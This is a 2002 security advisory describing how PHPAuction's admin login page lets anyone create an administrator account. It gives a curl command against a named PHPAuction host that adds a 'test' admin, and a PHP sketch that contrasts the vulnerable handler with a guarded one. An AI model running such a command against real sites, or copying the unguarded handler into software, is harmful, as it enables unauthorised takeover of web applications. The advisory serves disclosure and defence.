3rd Jul 2002 [SBWID-5508]
COMMAND
PHPAuction allows anyone to create an admin account for this software
SYSTEMS AFFECTED
All releases up until today (03 July 2002) ?
PROBLEM
ethx says :
File /admin/login.php checks only that there is $action set to
"insert" and then goes ahead and inserts username and password (if
both are provided) in adminUsers table.
The following line added an admin user with username test and password
test:
curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"
SOLUTION
None yet
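The check that is missing from the behaviour described under PROBLEM, shown as an added example (not PHPAuction source and not a vendor fix). Only the adminUsers table and the action/username/password parameters come from the advisory; the column names, function names, session key, in-memory SQLite database and password hashing are assumptions made so the sketch runs on its own.

```php
<?php
// Added example, not PHPAuction source. Only the adminUsers table and the
// action/username/password parameters come from the advisory; column names,
// function names and the session key are assumptions.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE adminUsers (username TEXT PRIMARY KEY, password TEXT NOT NULL)');
    // Constructed pre-existing administrator, so the site is past first-run setup.
    insert_admin($db, 'owner', 'constructed-password');
    return $db;
}

function insert_admin(PDO $db, string $user, string $pass): void {
    $stmt = $db->prepare('INSERT INTO adminUsers (username, password) VALUES (?, ?)');
    $stmt->execute([$user, password_hash($pass, PASSWORD_DEFAULT)]);
}

function wants_insert(array $post): bool {
    $u = $post['username'] ?? '';
    $p = $post['password'] ?? '';
    return ($post['action'] ?? '') === 'insert'
        && is_string($u) && $u !== '' && is_string($p) && $p !== '';
}

// Behaviour as the advisory describes it: the form fields alone are enough.
function handle_as_described(PDO $db, array $post): bool {
    if (!wants_insert($post)) return false;
    insert_admin($db, $post['username'], $post['password']);
    return true;
}

// Guarded: allow the insert only during first-run setup (no admin exists yet)
// or when the server-side session is already authenticated as an admin.
function handle_guarded(PDO $db, array $post, array $session): bool {
    if (!wants_insert($post)) return false;
    $firstRun = (int) $db->query('SELECT COUNT(*) FROM adminUsers')->fetchColumn() === 0;
    $isAdmin = ($session['admin_authenticated'] ?? false) === true;
    if (!$firstRun && !$isAdmin) return false;
    insert_admin($db, $post['username'], $post['password']);
    return true;
}

// Constructed request carrying the same three fields as the advisory's example.
$post = ['action' => 'insert', 'username' => 'test', 'password' => 'test'];
printf("as described, no session: %s\n", var_export(handle_as_described(make_db(), $post), true));
printf("guarded, no session:      %s\n", var_export(handle_guarded(make_db(), $post, []), true));
printf("guarded, admin session:   %s\n", var_export(handle_guarded(make_db(), $post, ['admin_authenticated' => true]), true));
```

The first-run branch is only safe while the installer is the sole party able to reach the page; once the initial account exists the decision rests entirely on the server-side session, never on request parameters.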